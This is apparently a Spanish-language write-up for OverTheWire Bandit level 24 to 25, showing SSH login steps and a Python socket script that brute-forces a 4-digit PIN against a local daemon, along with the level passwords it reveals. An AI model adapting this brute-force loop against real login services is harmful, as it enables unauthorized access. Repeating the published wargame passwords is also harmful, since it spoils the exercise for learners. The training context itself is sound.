Y. Bandit Level 24 → Level 25 - Walkthrough
Objetivo del Nivel
Un daemon está escuchando en el puerto 30002 y proporcionará la contraseña para bandit25 si recibe la contraseña correcta de bandit24 y un código PIN de 4 dígitos. No hay manera de obtener el PIN más que probando todas las combinaciones posibles, lo que significa que debemos hacer un ataque de fuerza bruta.
Conceptos Claves
Fuerza Bruta
Este método consiste en probar todas las combinaciones posibles hasta encontrar la correcta. En este caso, tenemos 10,000 combinaciones posibles (0000 a 9999).
Sockets en Python
Un socket es una forma de comunicación entre procesos a través de la red. En este reto, usaremos sockets TCP para comunicarnos con el daemon en localhost y enviar los intentos de PIN de manera continua sin cerrar la conexión.
Pasos para Resolver el Nivel
1. Conectar a Bandit 24
Inicia sesión con la contraseña obtenida en el nivel anterior.
ssh bandit24@bandit.labs.overthewire.org -p 2220Cuando se solicite, ingresa la contraseña:
gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G82. Crear el Script en /tmp
Nos movemos a la carpeta /tmp (ya que no tenemos permisos de escritura en ~/):
cd /tmpCreamos un nuevo archivo llamado bruteforce.py:
nano bruteforce.pyPega el siguiente código en el editor.
3. Código en Python para la Fuerza Bruta
Este script intentará todas las combinaciones de PIN en una sola conexión sin necesidad de reconectarse en cada intento.
#!/usr/bin/env python3
import socket
import time
# Configuración de la conexión
host = 'localhost'
port = 30002
# Contraseña de bandit24 (asegúrate de usar la correcta)
password = 'gb8KRRCsshuZXI0tUuR6ypOFjiZbf3G8'
# Crear socket TCP y conectar al daemon en el puerto 30002
s = socket.socket()
s.connect((host, port))
# Leer el banner inicial si lo hay
try:
banner = s.recv(1024).decode('utf-8')
print("Banner inicial:\n", banner)
except Exception:
print("No se pudo leer el banner inicial.")
# Iterar sobre todos los posibles PINs (0000 - 9999)
for pin in range(10000):
pin_str = f"{pin:04d}" # Asegura que el PIN tenga 4 dígitos (ej: 0001, 0023)
# Construir el mensaje: "contraseña PIN"
mensaje = f"{password} {pin_str}\n"
# Enviar el intento
s.sendall(mensaje.encode())
# Leer la respuesta
try:
respuesta = s.recv(1024).decode('utf-8')
except Exception:
print("Error al recibir respuesta.")
break
# Si encontramos la contraseña, la imprimimos y terminamos
if "Password" in respuesta or "bandit25" in respuesta:
print(f"¡PIN encontrado! PIN: {pin_str}")
print("Respuesta del daemon:\n", respuesta)
break
else:
print(f"Intento con PIN {pin_str} fallido.")
# Cerrar la conexión
s.close()4. Dar Permisos de Ejecución
Después de guardar el archivo (CTRL + X, luego Y y Enter), necesitamos darle permisos de ejecución:
chmod +x bruteforce.py5. Ejecutar el Script
Ahora podemos ejecutar el script y dejar que haga la fuerza bruta automáticamente:
./bruteforce.pyEste script probará todas las combinaciones de PIN (0000 a 9999) en una única conexión.
Cuando encuentre el PIN correcto, imprimirá algo como esto:
¡PIN encontrado! PIN: 9297
Respuesta del daemon:
Correct!
The password of user bandit25 is iCi86ttT4KSNe1armKiwbQNmB3YJP3q4Copiamos esta contraseña y la usamos para el siguiente nivel.
6. Conectar a Bandit 25
ssh bandit25@bandit.labs.overthewire.org -p 2220Cuando se solicite la contraseña, pegamos la que encontramos en el paso anterior.
Explicación del Código
socket.socket(): Crea una conexión TCP.s.connect((host, port)): Se conecta al puerto 30002 enlocalhost.s.sendall(mensaje.encode()): Envía la contraseña y el PIN al daemon.s.recv(1024).decode(): Recibe la respuesta del daemon.for pin in range(10000): Itera desde0000hasta9999probando cada PIN.if "Password" in respuesta: Verifica si la respuesta contiene la contraseña debandit25.
Conclusión
Este método permite encontrar el PIN correcto en menos de 1 minuto sin necesidad de abrir múltiples conexiones. Si el script se interrumpe, puedes volver a ejecutarlo y comenzará desde 0000 nuevamente.
¡Felicidades! Has completado el nivel 24 y ahora puedes avanzar al nivel 25. 🚀
Última actualización